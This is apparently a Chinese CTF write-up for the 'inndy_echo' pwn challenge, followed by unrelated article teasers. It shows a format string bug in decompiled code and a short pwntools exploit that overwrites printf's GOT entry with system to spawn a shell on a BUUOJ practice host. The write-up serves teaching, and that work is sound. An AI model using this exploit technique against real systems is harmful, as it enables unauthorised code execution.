inndy_echo

news2024/11/29 22:39:31

inndy_echo

Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x8048000)

32位,只开了NX

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  char s; // [esp+Ch] [ebp-10Ch]
  unsigned int v4; // [esp+10Ch] [ebp-Ch]

  v4 = __readgsdword(0x14u);
  setvbuf(stdin, 0, 2, 0);
  setvbuf(stdout, 0, 2, 0);
  do
  {
    fgets(&s, 0x100, stdin);
    printf(&s);
  }
  while ( strcmp(&s, "exit\n") );
  system("echo Goodbye");
  exit(0);
}

程序很简单,给了格式化字符串漏洞,并且给了system

思路

printf@got-->system 输入/bin/sh

from pwn import*
from Yapack import *
r,elf=rec("node4.buuoj.cn",25120,"./pwn",10)
context(os='linux', arch='i386',log_level='debug')
#debug('b *0x80485b9')

pl=fmtstr_payload(7,{elf.got['printf']:elf.sym['system']})
sl(pl)
sl(b'/bin/sh\x00')
ia(c)

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1052014.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

微信小程序引入字体在部分机型失效不兼容解决办法

微信小程序引入字体在部分机型失效不兼容解决办法

写小程序页面,美工作图用了特殊字体 引入代码: font-face {font-family: huxiaobo;src: url("https://xxxxxxxx.top/assets/fonts/huxiaobonanshenti.woff") } .font-loaded {font-family: "huxiaobo"; } 上线后发现部分安卓机型不…
阅读更多...
Java下Properties类的使用(写出和读入)

Java下Properties类的使用(写出和读入)

代码如下: public class MyWork {public static void main(String[] args) throws IOException {Properties pro1 new Properties();pro1.setProperty("0001","张三");pro1.setProperty("0002","李四");pro1.setProperty…
阅读更多...
1600*E. Kolya and Movie Theatre(贪心优先队列规律)

1600*E. Kolya and Movie Theatre(贪心优先队列规律)

Kolya and Movie Theatre - 洛谷 Problem - 1862E - Codeforces 解析: 可以观察到每次看电影所减少的舒畅值都和前一次有关,这样的话,可以发现减少的 d 只和最后一次看电影的时间有关。 所以枚举最后一次看电影的时间,并且维护一…
阅读更多...
iOS设备管理器iMazing比iTunes好用吗?有哪些优势

iOS设备管理器iMazing比iTunes好用吗?有哪些优势

虽然 iTunes 是 Apple 官方指定的 iPhone 数据备份和管理工具,但是一直以来 iTunes 卡顿的使用体验和过慢的备份过程为不少人诟病。如果大家也被 iTunes 体验不佳的备份和管理功能所困扰,那么简单易用、功能强大的iMazing 能为你解决这个问题。 iMazing…
阅读更多...
java web+Mysql e-life智能生活小区物业管理系统

java web+Mysql e-life智能生活小区物业管理系统

本项目为本人自己书写,主要服务小区业主和管理人员。 e-life智能生活小区涉及多个方面的智能化和便利化服务: 1. 用户模块:包含基本的登入登出操作,查看个人信息中用户可以查看 自己的个人资料但不可以修改个人信息。 a) 用户…
阅读更多...
从零开始学习 Java:简单易懂的入门指南之IO字节流(三十)

从零开始学习 Java:简单易懂的入门指南之IO字节流(三十)

IO流之字节流 1. IO概述1.1 什么是IO1.2 IO的分类1.3 IO的流向说明图解1.4 顶级父类们 2. 字节流2.1 一切皆为字节2.2 字节输出流【OutputStream】2.3 FileOutputStream类构造方法写出字节数据数据追加续写写出换行 2.4 字节输入流【InputStream】2.5 FileInputStream类构造方法…
阅读更多...
自学成为一名黑客(自学笔记)

自学成为一名黑客(自学笔记)

前言: 想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客 网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“…
阅读更多...
Armv9 Cortex-A720的L2 memory system 和 L2 Cache

Armv9 Cortex-A720的L2 memory system 和 L2 Cache

9 L2 memory system Cortex-A720核心的L2内存系统通过CPU bridge连接core与DynamIQ Shared Unit-120,其中包括私有的L2缓存。 L2缓存是统一的,每个Cortex-A720核心在一个集群中都有私有的L2缓存。 L2内存系统包括使用虚拟地址(VA)和程序计数器(PC)的数据预取引擎。不同…
阅读更多...
C++——函数指针与指针函数

C++——函数指针与指针函数

函数指针与指针函数 1. 初识 一个区分的小技巧: “函数指针”中函数是用来修饰指针的,所以主体是指针,它主要是用来指向函数的。 “指针函数”中指针是用来修饰函数的,所以主体是函数,该函数的返回类型是指针。 举个…
阅读更多...
A1048 Find Coins(测试点1)

A1048 Find Coins(测试点1)

Sample Input 1: 8 15 1 2 8 7 2 4 11 15 Sample Output 1: 4 11 Sample Input 2: 7 14 1 8 7 2 4 11 15 Sample Output 2: No Solution idea 测试点1:m比i小的情况处理小细节:i m/2时,注意i的出现次数必须大于一次 solution #in…
阅读更多...
【数据结构--八大排序】之冒泡排序+选择排序+插入排序

【数据结构--八大排序】之冒泡排序+选择排序+插入排序

💐 🌸 🌷 🍀 🌹 🌻 🌺 🍁 🍃 🍂 🌿 🍄🍝 🍛 🍤 📃个人主页 :阿然成长日记 …
阅读更多...
【数据库——MySQL】(13)过程式对象程序设计——存储函数、错误处理以及事务管理

【数据库——MySQL】(13)过程式对象程序设计——存储函数、错误处理以及事务管理

目录 1. 存储函数2. 存储函数的应用3. 错误处理4. 抛出异常5. 事务处理6. 事务隔离级7. 应用实例参考书籍 1. 存储函数 要 创建 存储函数,需要用到 CREATE 语句: CREATE FUNCTION 存储函数名([参数名 类型, ...])RETURNS 类型[存储函数体]注意&#xff1…
阅读更多...
ESP32IDF — 硬件I2C使用教程

ESP32IDF — 硬件I2C使用教程

前言 (1)最近刚做完ESP32的一个模块的驱动移植,使用到了I2C。感觉ESP32的硬件I2C还是挺容易使用的。 (2)本文将只会介绍ESP32的硬件I2C使用,如果想知道软件I2C使用,可看其他的任意一款芯片软件I…
阅读更多...
双指针算法——移动零

双指针算法——移动零

双指针算法——移动零😎 前言🙌题目详情:图解分析:代码分享:B站讲解视频链接: 总结撒花💞 😎博客昵称:博客小梦 😊最喜欢的座右铭:全神贯注的上吧…
阅读更多...
数据集笔记:华盛顿共享单车OD数据

数据集笔记:华盛顿共享单车OD数据

2010~2022 共享单车OD数据 数据地址:Index of bucket "capitalbikeshare-data"
阅读更多...
STM32F4X UCOSIII任务消息队列

STM32F4X UCOSIII任务消息队列

STM32F4X UCOSIII任务消息队列 任务消息队列和内核消息队列对比内核消息队列内核消息队列 UCOSIII任务消息队列API任务消息队列发送函数任务消息队列接收函数 UCOSIII任务消息队列例程 之前的章节中讲解过消息队列这个机制,UCOSIII除了有内核消息队列之外&#xff0…
阅读更多...
【数据结构】队列实现+层序遍历详解+一些练题

【数据结构】队列实现+层序遍历详解+一些练题

欢迎来到我的:世界 希望作者的文章对你有所帮助,有不足的地方还请指正,大家一起学习交流 ! 目录 前言队列的实现层序遍历详解强化练习1.判断是不是完全二叉树求二叉树的最大深度 总结 前言 国庆到了,也要内卷一下,感…
阅读更多...
集合-List集合

集合-List集合

系列文章目录 1.集合-Collection-CSDN博客​​​​​​ 2.集合-List集合-CSDN博客 文章目录 目录 系列文章目录 文章目录 前言 一 . 什么是List? 二 . List集合的特点 三 . 常用方法 1.void add(int index, E element): 将指定的元素插入到列表的指定位置。 2.E remove(int in…
阅读更多...
1.4.C++项目:仿mudou库实现并发服务器之buffer模块的设计

1.4.C++项目:仿mudou库实现并发服务器之buffer模块的设计

一、buffer模块: 缓冲区模块 Buffer模块是一个缓冲区模块,用于实现通信中用户态的接收缓冲区和发送缓冲区功能。 二、提供的功能 存储数据,取出数据 三、实现思想 1.实现换出去得有一块内存空间,采用vector ,vector底层是一个…
阅读更多...
opencv图像数组坐标系

opencv图像数组坐标系

在OpenCV的Python接口(cv2)中,加载的图像数组遵循以下坐标系和方向约定: 1. **坐标系:** OpenCV的坐标系遵循数学中的坐标系,原点(0, 0)位于图像的左上角。横轴(X轴&…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023